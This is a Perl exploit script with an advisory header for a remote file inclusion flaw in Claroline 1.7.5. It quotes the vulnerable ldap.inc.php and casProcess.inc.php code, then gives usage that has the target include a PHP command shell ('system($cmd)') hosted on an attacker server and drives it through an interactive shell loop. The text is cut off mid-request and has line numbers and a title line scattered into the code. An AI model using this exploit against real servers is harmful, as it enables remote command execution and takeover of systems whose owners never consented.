1 #!/usr/bin/perl
2 ############
3 # Claroline Open Source e-Learning 1.7.5 Remote File Include
4 # Exploit & Advisory: beford <xbefordx gmail com>
5 #
6 # uso:#
perl own.pl <host> <cmd−shell−url> <cmd−var>
7 #
perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
8 #
9 # cmd shell example: <? system($cmd); ?>
10 # cmd variable: cmd;
11 #
12 #############
13 # Description
14 #############
15 # Vendor: http://www.claroline.net
16 # The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
17 # clarolineRepositorySys in a require path without initializing it first, so
18 # the path can be influenced from outside the script. Other files in the same
19 # folder are vulnerable in the same way; this exploit only attacks ldap.inc.php.
20 #
21 # Another vulnerable file is claroline/auth/extauth/casProcess.inc.php:
22 # it uses claro_CasLibPath in an include_once statement, and that variable is
23 # not initialized either, so it is also open to RFI. The vendor was contacted
24 # by email and did not respond, so I posted this here and on the vendor's forum.
25 ############
26 # Vulnerable code (ldap.inc.php)
27 ############
28 # return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
29 ############
30 # Vulnerable code (casProcess.inc.php)
31 ############
32 #if ( ! isset($_SESSION['init_CasCheckinDone'] )
33 # || $logout
34 # || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
35 # || isset($_REQUEST['fromCasServer']) )
36 #{
37 # include_once $claro_CasLibPath;
38 ############
39 use LWP::UserAgent;
40
41 $Path = $ARGV[0];
42 $Pathtocmd = $ARGV[1];
43 $cmdv = $ARGV[2];
44 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
45 head();
46 while() {
47
print "[shell] \$";
48
while(<STDIN>) {
49
$cmd=$_;
50
chomp($cmd);
51
if (!$cmd) {last;}
Claroline eLearning 1.75 ldap.inc.php Remote File Inclusion Exploit
beford
05/08/2006
52
$xpl = LWP::UserAgent−>new() or die;
53
$req = HTTP::Request−>new(GET =>$Path.’extauth/drivers/ldap.inc.